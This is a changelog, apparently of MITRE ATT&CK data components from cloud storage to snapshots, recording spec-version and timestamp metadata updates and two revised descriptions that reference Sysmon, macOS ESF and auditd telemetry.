Cloud Service: Cloud Service Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274066Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274066Z2021-10-20T15:05:19.274Z

Cloud Service: Cloud Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274019Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274019Z2021-10-20T15:05:19.274Z

Cloud Service: Cloud Service Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274087Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274087Z2021-10-20T15:05:19.274Z

Cloud Storage: Cloud Storage Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272529Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272529Z2021-10-20T15:05:19.272Z

Cloud Storage: Cloud Storage Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272419Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272419Z2021-10-20T15:05:19.272Z

Cloud Storage: Cloud Storage Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272467Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272467Z2021-10-20T15:05:19.272Z

Cloud Storage: Cloud Storage Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272508Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272508Z2021-10-20T15:05:19.272Z

Cloud Storage: Cloud Storage Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272487Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272487Z2021-10-20T15:05:19.272Z

Cloud Storage: Cloud Storage Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272445Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272445Z2021-10-20T15:05:19.272Z

Container: Container Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274861Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274861Z2021-10-20T15:05:19.274Z

Container: Container Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274904Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274904Z2021-10-20T15:05:19.274Z

Container: Container Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274884Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274884Z2021-10-20T15:05:19.274Z

Container: Container Start

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274928Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274928Z2021-10-20T15:05:19.274Z

Domain Name: Domain Registration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275531Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275531Z2021-10-20T15:05:19.275Z

Drive: Drive Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273087Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273087Z2021-10-20T15:05:19.273Z

Drive: Drive Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273011Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273011Z2021-10-20T15:05:19.273Z

Drive: Drive Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273061Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273061Z2021-10-20T15:05:19.273Z

Driver: Driver Load

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274308Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274308Z2021-10-20T15:05:19.274Z

Driver: Driver Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274285Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274285Z2021-10-20T15:05:19.274Z

File: File Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273770Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273770Z2021-10-20T15:05:19.273Z

File: File Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273724Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273724Z2021-10-20T15:05:19.273Z

File: File Deletion

Current version: 1.0


Old Description
New Description
t1Removal of a file (ex: Sysmon EID 23)t1Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT
 >_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, 
 >rmdir, unlinked, or renameat rules)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273745Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273745Z2022-03-30T14:26:51.805Z
descriptionRemoval of a file (ex: Sysmon EID 23)Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

File: File Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273701Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273701Z2021-10-20T15:05:19.273Z

File: File Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273791Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273791Z2021-10-20T15:05:19.273Z

Firewall: Firewall Disable

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273233Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273233Z2021-10-20T15:05:19.273Z

Firewall: Firewall Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273275Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273275Z2021-10-20T15:05:19.273Z

Firewall: Firewall Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273209Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273209Z2021-10-20T15:05:19.273Z

Firewall: Firewall Rule Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273254Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273254Z2021-10-20T15:05:19.273Z

Firmware: Firmware Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271356Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271356Z2021-10-20T15:05:19.271Z

Group: Group Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275365Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275365Z2021-10-20T15:05:19.275Z

Group: Group Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275303Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275303Z2021-10-20T15:05:19.275Z

Group: Group Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275385Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275385Z2021-10-20T15:05:19.275Z

Image: Image Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271986Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271986Z2021-10-20T15:05:19.271Z

Image: Image Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272030Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272030Z2021-10-20T15:05:19.272Z

Image: Image Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272052Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272052Z2021-10-20T15:05:19.272Z

Image: Image Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272009Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272009Z2021-10-20T15:05:19.272Z

Instance: Instance Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274569Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274569Z2021-10-20T15:05:19.274Z

Instance: Instance Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274612Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274612Z2021-10-20T15:05:19.274Z

Instance: Instance Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274654Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274654Z2021-10-20T15:05:19.274Z

Instance: Instance Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274633Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274633Z2021-10-20T15:05:19.274Z

Instance: Instance Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274591Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274591Z2021-10-20T15:05:19.274Z

Instance: Instance Start

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274676Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274676Z2021-10-20T15:05:19.274Z

Instance: Instance Stop

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274698Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274698Z2021-10-20T15:05:19.274Z

Kernel: Kernel Module Load

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272119Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272119Z2021-10-20T15:05:19.272Z

Logon Session: Logon Session Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274381Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274381Z2021-10-20T15:05:19.274Z

Module: Module Load

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272586Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272586Z2021-10-20T15:05:19.272Z

Named Pipe: Named Pipe Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273848Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273848Z2021-10-20T15:05:19.273Z

Network Share: Network Share Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275043Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275043Z2021-10-20T15:05:19.275Z

Network Traffic: Network Traffic Content

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274493Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274493Z2021-10-20T15:05:19.274Z

Network Traffic: Network Traffic Flow

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274471Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274471Z2021-10-20T15:05:19.274Z

Process: OS API Execution

Current version: 1.0


Old Description
New Description
t1Operating system function/method calls executed by a processt1Initial construction of a WMI object, such as a filter, cons
 >umer, subscription, binding, or provider (ex: Sysmon EIDs 19
 >-21)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272354Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272354Z2022-03-30T14:26:51.806Z
descriptionOperating system function/method calls executed by a processInitial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Domain Name: Passive DNS

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275489Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275489Z2021-10-20T15:05:19.275Z

Pod: Pod Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272791Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272791Z2021-10-20T15:05:19.272Z

Pod: Pod Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272897Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272897Z2021-10-20T15:05:19.272Z

Pod: Pod Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272873Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272873Z2021-10-20T15:05:19.272Z

Pod: Pod Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272840Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272840Z2021-10-20T15:05:19.272Z

Process: Process Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272320Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272320Z2021-10-20T15:05:19.272Z

Process: Process Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272172Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272172Z2021-10-20T15:05:19.272Z

Process: Process Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272285Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272285Z2021-10-20T15:05:19.272Z

Process: Process Termination

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272261Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272261Z2021-10-20T15:05:19.272Z

Internet Scan: Response Content

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275251Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275251Z2021-10-20T15:05:19.275Z

Internet Scan: Response Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275230Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275230Z2021-10-20T15:05:19.275Z

Scheduled Job: Scheduled Job Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271629Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271629Z2021-10-20T15:05:19.271Z

Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271606Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271606Z2021-10-20T15:05:19.271Z

Scheduled Job: Scheduled Job Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271671Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271671Z2021-10-20T15:05:19.271Z

Service: Service Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273425Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273425Z2021-10-20T15:05:19.273Z

Service: Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273397Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273397Z2021-10-20T15:05:19.273Z

Service: Service Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273447Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273447Z2021-10-20T15:05:19.273Z

Snapshot: Snapshot Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273503Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273503Z2021-10-20T15:05:19.273Z

Snapshot: Snapshot Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273555Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273555Z2021-10-20T15:05:19.273Z

Snapshot: Snapshot Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273600Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273600Z2021-10-20T15:05:19.273Z

Snapshot: Snapshot Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
